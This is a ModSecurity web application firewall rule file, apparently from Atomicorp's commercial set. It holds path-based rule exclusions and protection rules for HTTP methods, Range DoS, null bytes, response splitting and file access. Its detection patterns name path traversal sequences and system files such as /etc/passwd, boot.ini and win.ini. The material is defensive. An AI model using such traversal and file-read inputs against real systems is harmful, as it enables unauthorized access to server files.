SecRule REQUEST_FILENAME "/admin/newsentry/newsitemcreate" "phase:2,id:92658,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"

SecRule REQUEST_FILENAME "/secure_access/catalog/product/validate/" "phase:2,id:92659,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340162"

SecRule REQUEST_FILENAME "/wp-json/script-manager/v1/scripts" "phase:2,id:92660,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"

SecRule REQUEST_FILENAME "/kel4dm1n/edit_orders_ajax\.php" "phase:2,id:92661,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=340029"

SecRule REQUEST_FILENAME "/ajax-call" "phase:2,id:92662,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"

SecRule REQUEST_FILENAME "/wp-json/wp/v2/media" "phase:2,id:92663,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163"

SecRule REQUEST_FILENAME "/module/personnalisation/product" "phase:2,id:92664,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340029"

SecRule REQUEST_FILENAME "/theme/design_config/save/back/edit" "phase:2,id:92665,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"

SecRule REQUEST_FILENAME "/applicationerror\.aspx" "phase:2,id:92666,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340009"

SecRule REQUEST_FILENAME "/admin/app/customer/" "phase:2,id:92667,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"

SecRule REQUEST_FILENAME "/admin/content/instituts/" "phase:2,id:92668,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163"

SecRule REQUEST_FILENAME "/auth/module\.php" "phase:2,id:92669,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340165"

SecRule REQUEST_FILENAME "/auth/module\.php/saml/sp/saml2-logout\.php/default-sp" "phase:2,id:92670,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340165"

SecRule REQUEST_FILENAME "/auth/module\.php/saml/sp/saml2-logout\.php" "phase:2,id:92671,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340165"

SecRule REQUEST_FILENAME "/magic/kel4dm1n/categories\.php" "phase:2,id:92672,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340156"

SecRule REQUEST_FILENAME "/portal_api/services/returnmanagement/datafile/amenddatafile" "phase:2,id:92673,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=344367"

SecRule REQUEST_FILENAME "/v2b/json/" "phase:2,id:92674,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"

SecRule REQUEST_FILENAME "/cbc_portal_api_dev/services/returnmanagement/datafile/amenddatafile" "phase:2,id:92675,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=344367"

SecRule REQUEST_FILENAME "/scp/plugins\.php" "phase:2,id:92676,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163"

SecRule REQUEST_FILENAME "/scp/ajax\.php" "phase:2,id:92677,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163"

SecRule REQUEST_FILENAME "/wp-json/wp-statistics/v2" "phase:2,id:92678,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340165"

SecRule REQUEST_FILENAME "/cbc_portal_api_dev/" "phase:2,id:92679,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"

SecRule REQUEST_FILENAME "/wc-api/wc_bookings_google_calendar_wooconnect/" "phase:2,id:92680,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340165"

SecRule REQUEST_FILENAME "/signinresult\.php" "phase:2,id:92681,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147"

SecRule REQUEST_FILENAME "/wp-load\.php" "phase:2,id:92682,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=390715"

SecRule REQUEST_FILENAME "/wp-load\.php" "phase:2,id:92683,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=390715"

SecRule REQUEST_FILENAME "/executehtml\.php" "phase:2,id:92684,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=350147"

SecRule REQUEST_FILENAME "/admin/listings\.php" "phase:2,id:92685,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163"

SecRule REQUEST_FILENAME "/ajax/send_email_or_sms\.php" "phase:2,id:92686,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=342259"

SecRule REQUEST_FILENAME "/wp-json/wp/v2/" "phase:2,id:92687,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=340165"

SecRule REQUEST_FILENAME "/admin/orders\.php" "phase:2,id:92688,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340165"

SecRule REQUEST_FILENAME "/content/postsave" "phase:2,id:92689,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=333141"

SecRule REQUEST_FILENAME "/wp-json/wp/v2/posts/" "phase:2,id:92690,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333141"

SecRule REQUEST_FILENAME "/admin/rsvp_edit\.php" "phase:2,id:92691,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=350148"

SecRule REQUEST_FILENAME "/wp-json/contact-form-7/" "phase:2,id:92692,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340162"

SecRule REQUEST_FILENAME "/v2b/json/fr\.html\.text/" "phase:2,id:92693,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340148"

SecRule REQUEST_FILENAME "/block/add/code_block" "phase:2,id:92694,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=393655"

SecRule REQUEST_FILENAME "/v2c/json/fr\.device\.preview/" "phase:2,id:92695,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=393655"

SecRule REQUEST_FILENAME "/pests/edit/" "phase:2,id:92696,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340029"

SecRule REQUEST_FILENAME "/admin/app/customer/32/edit?uniqid=s64ef8923c69f3" "phase:2,id:92697,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=393655"

SecRule REQUEST_FILENAME "/wp-admin/options\.php" "phase:2,id:92698,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340148"

SecRule REQUEST_FILENAME "/v2a/json/" "phase:2,id:92699,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=344371"

SecRule REQUEST_FILENAME "/v2a/json/" "phase:2,id:92700,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=344371"

SecRule REQUEST_FILENAME "/wp-json/" "phase:2,id:92701,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=344371,ctl:ruleRemovebyID=340130"

SecRule REQUEST_FILENAME "/admin/app/customer/" "phase:2,id:92702,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=344371"

SecRule REQUEST_FILENAME "/admin/ebook/" "phase:2,id:92703,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=344371"

SecRule REQUEST_FILENAME "/api/redbox/" "phase:2,id:92704,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=344371"

SecRule REQUEST_FILENAME "/ajax/update-form" "phase:2,id:92705,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=344371,ctl:ruleRemovebyID=344367"

SecRule REQUEST_FILENAME "/contao/picker" "phase:2,id:92706,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340130"

SecRule REQUEST_FILENAME "/amember/admin-products" "phase:2,id:92707,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333141"

SecRule REQUEST_FILENAME "/doku\.php" "phase:2,id:92708,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340130"

SecRule REQUEST_FILENAME "/editor/filter_xss/" "phase:2,id:92709,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340148"

SecRule REQUEST_FILENAME "/admin/app/media/" "phase:2,id:92710,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=344367"

SecRule REQUEST_FILENAME "/modules/accordion/save_question\.php" "phase:2,id:92711,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=393655"

SecRule REQUEST_FILENAME "/adm_program/modules/announcements/announcements_function\.php" "phase:2,id:92712,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=393655"

SecRule REQUEST_FILENAME "/configgeneral\.php" "phase:2,id:92713,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=342259"

SecRule REQUEST_FILENAME "/apps/weditorwd8/index\.php" "phase:2,id:92714,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333141"

SecRule REQUEST_FILENAME "/editcontent" "phase:2,id:92715,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=340147"

SecRule REQUEST_FILENAME "/form/save" "phase:2,id:92716,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=350148"

SecRule REQUEST_FILENAME "/westerbus" "phase:2,id:92717,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=393655"

SecRule REQUEST_FILENAME "/client/applications" "phase:2,id:92718,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=344367"

SecRule REQUEST_FILENAME "/moodle/mod/quiz/autosave\.ajax\.php" "phase:2,id:92719,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=344367"

SecRule REQUEST_FILENAME "/backend/livingtech/water/readings/update/1567" "phase:2,id:92720,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=393655"

SecRule REQUEST_FILENAME "/wp-json/contact-form-7/v1/contact-forms/947" "phase:2,id:92721,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=342259"

SecRule REQUEST_FILENAME "/wp-admin/edit\.php" "phase:2,id:92722,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340130"

SecRule REQUEST_FILENAME "/backend/" "phase:2,id:92723,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=393655"

SecRule REQUEST_FILENAME "/backend/" "phase:2,id:92724,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=393655"

SecRule REQUEST_FILENAME "/kontakt/" "phase:2,id:92725,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=342259"

SecRule REQUEST_FILENAME "/plugins/servlet/gadgets" "phase:2,id:92726,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340029"

SecRule REQUEST_FILENAME "/panel/x3_settings\.php" "phase:2,id:92727,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=340130"

SecRule REQUEST_FILENAME "/portal_api/services/returnmanagement/datafile" "phase:2,id:92728,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=344367"

SecRule REQUEST_FILENAME "/toolbox_nb/" "phase:2,id:92729,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340121,ctl:ruleRemovebyID=340152,ctl:ruleRemovebyID=380018,ctl:ruleRemovebyID=380026,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=333141"

SecRule REQUEST_FILENAME "/g/collect" "phase:2,id:92730,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165"

SecRule REQUEST_FILENAME "/inside/" "phase:2,id:92731,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147"

SecRule REQUEST_FILENAME "/toolbox_nb/" "phase:2,id:92732,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340121,ctl:ruleRemovebyID=333141"

SecRule REQUEST_FILENAME "/tml_downloader/" "phase:2,id:92733,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333141"

SecRule REQUEST_FILENAME "list_bulk\.aspx" "phase:2,id:92734,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340029"

SecRule REQUEST_FILENAME "open\.php" "phase:2,id:92735,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=350148"

SecRule REQUEST_FILENAME "/toolbox_nb/" "phase:2,id:92736,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=390704,ctl:ruleRemovebyID=340016,ctl:ruleRemovebyID=340122,ctl:ruleRemovebyID=342259"

SecRule REQUEST_FILENAME "^/contao" "phase:2,id:92737,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340130"

# http://www.atomicorp.com/
# Atomicorp (Gotroot.com) ModSecurity rules
# Application Security Rules for modsec 2.x
#
# Copyright 2005-2023 by Atomicorp, Inc. all rights reserved.
# Redistribution is strictly prohibited in any form, including whole or in part.
#
# Distribution of this work or derivative of this work in any form is
# prohibited unless prior written permission is obtained from the
# copyright holder.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS AS IS
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF
# THE POSSIBILITY OF SUCH DAMAGE.
#
#---ASL-CONFIG-FILE---
#

# Do not edit this file!
# This file is generated and changes will be overwritten.
#
# If you need to make changes to the rules, please follow the procedure here:
# http://www.atomicorp.com/wiki/index.php/Mod_security
#SecAction "phase:1,t:none,pass,nolog,noauditlog,initcol:global=global,initcol:ip=%{remote_addr}"
#




#Block compressed encoding
SecRule REQUEST_HEADERS:Content-Encoding "^Identity$" "capture,log,auditlog,phase:1,t:none,deny,status:501,msg:'Atomicorp.com WAF Rules: ModSecurity does not support content encodings and can not detect attacks using it, therefore it must be blocked.',id:'340362',rev:3,severity:'3',logdata:'%{TX.0}'"

# Indicators list
SecRemoteRulesFailAction Warn
SecRemoteRules cH3qcelhFi https://updates.atomicorp.com/channels/rules/installers/indicators.conf

#check methods
SecRule REQUEST_METHOD "@pm TRACE TRACK CONNECT" "phase:1,id:'333793',t:none,pass,nolog,noauditlog,skip:1"
SecAction "phase:1,id:334358,t:none,pass,nolog,noauditlog,skipAfter:END_METHOD_CHECKS"

# Rule 340002: deny TRACE method
SecRule REQUEST_METHOD "@pm TRACE TRACK" "phase:1,deny,log,auditlog,status:403,t:none,id:340002,rev:3,severity:2,msg:'Atomicorp.com WAF Rules: TRACE/TRACK method denied'"

# Rule 340361: deny CONNECT method
SecRule REQUEST_METHOD "CONNECT" "deny,status:403,log,auditlog,t:none,capture,phase:1,id:340361,rev:3,severity:2,msg:'Atomicorp.com WAF Rules: CONNECT method denied',logdata:'%{TX.0}'"

SecMarker END_METHOD_CHECKS

#protocol violation
SecRule REQUEST_METHOD "POST" "deny,status:403,log,auditlog,t:none,chain,rev:4,id:'390616',phase:2,msg:'Atomicorp.com WAF Rules: POST request must have a Content-Length header',severity:'4'"
SecRule &REQUEST_HEADERS:Content-Length "@eq 0" "t:none,chain"
SecRule &REQUEST_HEADERS:Transfer-Encoding "@eq 0" "t:none"

# Check for the expect header w/ HTTP/1.1 protocol
#
SecRule REQUEST_HEADERS:Expect "100-continue" "deny,status:403,t:none,chain,phase:2,log,auditlog,msg:'Atomicorp.com WAF Rules: Expect Header Not Allowed for HTTP 1.0.  This is an HTTP 1.1 feature.',severity:'5',id:'390706',rev:1"
SecRule REQUEST_PROTOCOL "@streq HTTP/1.0"

# Rule 340012:
#Proxy Protection with our added MATCHED_VAR enhancement
SecRule REQUEST_URI_RAW "^\w+:/"  "chain,phase:2,t:none,t:lowercase,capture,deny,log,auditlog,msg:'Atomicorp.com WAF Rules: Unauthorized Proxy access attempt',severity:'2',id:'340012',rev:3,logdata:'%{TX.0}'"
SecRule MATCHED_VAR "!@rx ://%{SERVER_NAME}/"

#Apache Range DOS attack protection rules
SecRule REQUEST_HEADERS:Range "(\d+)\-(\d+)\," "chain,capture,phase:2,rev:2,log,auditlog,t:none,deny,status:403,msg:'Atomicorp.com WAF Rules: Range: Invalid Last Byte Value. This may be a DOS attack',logdata:'%{matched_var}',severity:'5',id:'353012'"
        SecRule TX:2 "!@ge %{tx.1}"

SecRule REQUEST_FILENAME "\.pdf$" "phase:2,id:334359,pass,t:none,t:lowercase,nolog,noauditlog,skipAfter:END_RANGE_DOS"
SecRule REQUEST_HEADERS:Range "^bytes=(\d+)?\-(\d+)?\,(\d+)?\-(\d+)?\,(\d+)?\-(\d+)?\,(\d+)?\-(\d+)?\,(\d+)?\-(\d+)?\,(\d+)?\-(\d+)?\,(\d+)?\-(\d+)?\,(\d+)?\-(\d+)?\," "phase:2,log,auditlog,capture,rev:2,t:none,t:lowercase,deny,msg:'Atomicorp.com WAF Rules: Range: Too many fields, this may be a DOS attack',logdata:'%{matched_var}',severity:'5',id:'353013'"
SecMarker END_RANGE_DOS


#Webdav doesnt always include Content-Length
SecRule REQUEST_METHOD "^(?:CHECKOUT|PUT)"  "phase:1,id:364359,pass,t:none,nolog,noauditlog,skipAfter:END_TYPE_CHECK_1"

SecRule REMOTE_ADDR "@ipMatch 127.0.0.1,::1"  "phase:1,id:364459,pass,t:none,nolog,noauditlog,skipAfter:END_TYPE_CHECK_1"

#Request Body must define Content-Type per RFC, so application knows how to parse
#Prevents impedence mismatch attacks
SecRule &REQUEST_HEADERS:Content-Type "@eq 0" "log,auditlog,chain,phase:2,rev:8,t:none,deny,log,status:403,msg:'Atomicorp.com WAF Rules: Request Containing Content, but Missing Content-Type header',id:'392301',severity:'5',tag:'no_ar'"
        SecRule REQUEST_HEADERS:Content-Length "!^0$" "t:none"

SecMarker END_TYPE_CHECK_1

# This one has limited utility as a fixed rule, this probably needs to be generated by the customer
# Restrict the maximum number of arguments in a request
SecRule &ARGS "@gt 4096"  "chain,phase:2,t:none,log,auditlog,deny,status:403,msg:'Atomicorp.com WAF Rules: Too many arguments in request (max set to 4096, increase as necessary for your system)',id:'390707',severity:'4',rev:'9'"
SecRule REQUEST_URI "!((?:^/(?:imaclean|massdelete)/)|^/cgi-bin/dada/mail\.cgi$|^/index\.php/mageworx/customoptions_options|^/za/|^/back-?office/|^/moderate\.php|^/backend/configdomains\.php|\.do$|^/admin[a-z0-9]+?/index\.php\?controller=adminmodules)"  "t:none,t:lowercase"

SecRule &REQUEST_COOKIES_NAMES "@gt 1000" "phase:2,t:none,log,auditlog,deny,status:403,msg:'Atomicorp.com WAF Rules: Too many cookies in request (max set to 1000, increase as necessary for your system)',id:'330707',severity:'4',rev:2"

SecRule REQUEST_URI "set-cookie" "phase:2,t:none,t:urlDecodeUni,t:lowercase,log,auditlog,deny,status:403,msg:'Atomicorp.com WAF Rules: Possible CSRF attack',id:'330708',severity:'4',rev:2"

#
#Blocks certain types of obfuscation attacks on WAF
SecRule ARGS_NAMES "@validateByteRange 1-255" "deny,log,auditlog,status:403,phase:2,msg:'Atomicorp.com WAF Rules: Null Byte Attack Blocked (Null byte character in Argument Name)',rev:23,id:'390626',severity:'1'"

Secrule REQUEST_FILENAME "(?:/ajax-tab\.php|^/eprocservice/supplierinboundservice)" "phase:2,id:344358,t:none,t:lowercase,pass,nolog,noauditlog,skipAfter:END_CHAR_CHECK"

SecRule ARGS|ARGS_NAMES|!ARGS:/msg/|!ARGS:message|!ARGS:templatecode|!ARGS:/bps_customcode/|!ARGS:areas|!ARGS:/illegalusernames/|!ARGS:/pw/|!ARGS:/^jform/|!ARGS:/image/|!ARGS:resolution|!ARGS:post|!ARGS:depth|!ARGS:email|!ARGS:/comment/|!ARGS:mailbox|!ARGS:/description/|!ARGS:/txt/|!ARGS:/text/|!ARGS:body|!ARGS:/message/|!ARGS:/content/|!ARGS:/password/|!ARGS:FoxyData|!ARGS:sent_mail_folder "@validateByteRange 1-255" "pass,nolog,noauditlog,phase:2,rev:24,id:390617,t:none,t:urlDecodeUni,setvar:tx.invalidarg=1,setvar:tx.invalidarg2=%{matched_var_name}'"

#Is this a known spammer?
SecRule TX:INVALIDARG "@eq 1" "chain,t:none,log,auditlog,deny,status:403,phase:2,msg:'Atomicorp.com WAF Rules: Spammer attempting to defeat recapatcha',rev:1,id:'395614',severity:'2'"
SecRule TX:INVALIDARG2 "ARGS:recaptcha_response_field"

SecRule TX:INVALIDARG "@eq 1" "chain,deny,log,auditlog,status:403,phase:2,msg:'Atomicorp.com WAF Rules: Null Byte Attack Blocked (Invalid character in ARGS)',rev:23,id:'390614',severity:'2'"
SecRule TX:INVALIDARG2 "!@rx recaptcha_response_field"

SecMarker END_CHAR_CHECK

#block nulls and invalid characters
SecRule REQUEST_URI|REQUEST_HEADERS_NAMES|REQUEST_HEADERS|!REQUEST_HEADERS:Referer|!REQUEST_HEADERS:Cookie|!ARGS:templateCode|!ARGS:areas|!ARGS:/password/|!ARGS:FoxyData|!ARGS:sent_mail_folder "@validateByteRange 1-255" "deny,log,auditlog,status:403,phase:2,msg:'Atomicorp.com WAF Rules: Null Byte Attack Blocked (Invalid character in request or headers)',rev:10,id:'390613',severity:'2',t:none,t:urlDecodeUni"

#Check for digits in content length header
SecRule REQUEST_HEADERS:Content-Length "!^\d+$" "deny,log,auditlog,status:403,capture,phase:2,t:none,msg:'Atomicorp.com WAF Rules: Content-Length HTTP header is not numeric', severity:'2',rev:1,id:'390618',logdata:'%{TX.0}'"


#Response splitting attacks
SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/utm/|!REQUEST_COOKIES:/_pk_ref/|REQUEST_COOKIES_NAMES|ARGS_NAMES|REQUEST_URI "(?:\bhttp\/(?:0\.9|1\.[01])|< ?(?:html|meta)\b)" "phase:2,capture,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:compressWhitespace,t:lowercase,ctl:auditLogParts=+E,deny,log,auditlog,status:400,msg:'Atomicorp.com WAF Rules: Attack Blocked -  HTTP Response Splitting Attack',id:'390712',logdata:'%{TX.0}',severity:'1',rev:5"

#SecMarker END_SPLIT_CHECKS

###############FILE PROTECTION RULES####################
#
Secrule REQUEST_URI "^/eprocservice/supplierinboundservice" "phase:2,id:344359,t:none,t:lowercase,pass,nolog,noauditlog,skipAfter:END_FILE_PROTECTION_2"

SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/*|!ARGS:templatecode|!ARGS:area|!ARGS:php|!ARGS:/form_data/|!ARGS:/post/|!ARGS:/comment/|!ARGS:/desc/|!ARGS:/htaccess/|!ARGS:/subject/|!ARGS:/keywords/|!ARGS:/note/|!ARGS:/title/|!ARGS:/text/|!ARGS:/txt/|!ARGS:/body/|!ARGS:/message/|!ARGS:data|!ARGS:/content/|!ARGS:/resolution/|!ARGS:/wp_autosave/ "@pmFromFile os_files.txt" "id:344360,rev:5,severity:2,phase:2,deny,status:403,capture,t:none,t:utf8toUnicode,t:urlDecodeUni,t:normalizePathWin,t:lowercase,msg:'Atomicorp.com WAF Rules: Unauthorized Operating System File Access Attempt',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',tag:'attack-lfi',log,auditlog"

SecRule REQUEST_URI_RAW|ARGS|ARGS_NAMES|REQUEST_HEADERS|XML:/*|REQUEST_FILENAME|!ARGS:templatecode|!ARGS:area|!ARGS:php|!ARGS:/form_data/ "@pm ../ ... ..\ /etc /proc /var/tmp /usr /opt /sbin /bin /dev /tmp /kern /root /boot /sys /windows /winnt inetpub localstart.asp boot.ini ~root ~ftp ~bin ~nobody ~named ~guest ~logs ~sshd ~admin ~mysql ~postgres ~oracle //////// env win.ini" "id:334399,rev:2,phase:2,t:none,t:utf8toUnicode,t:urlDecodeUni,t:removeNulls,t:cmdLine,pass,nolog,noauditlog,skip:1"
SecAction "phase:2,id:334361,t:none,pass,nolog,noauditlog,skipAfter:END_FILE_PROTECTION_1"

#Legacy web servers or misconfigured webservers
SecRule REQUEST_URI "/etc/passwd" "phase:1,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:cmdline,id:347009,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Protected File access denied'"

#Invalid recursion
#.../...
SecRule REQUEST_URI|REQUEST_HEADERS|ARGS|ARGS_NAMES|XML:/* "\.\.\.%2F\.\.\.%2F"  	"deny,log,auditlog,status:403,t:none,capture,id:347017,phase:2,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Invalid Generic Path Recursion denied in URI/ARGS',logdata:'%{TX.0},%{matched_var_name}'"

SecRule REQUEST_URI|REQUEST_HEADERS|ARGS|ARGS_NAMES|XML:/* "\.\.\./\.\.\."  	"deny,log,auditlog,status:403,t:none,t:utf8toUnicode,t:urlDecodeUni,capture,id:347016,phase:2,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Invalid Generic Path Recursion denied in URI/ARGS',logdata:'%{TX.0},%{matched_var_name}'"

#potentially malicious recursion
#../../../../..
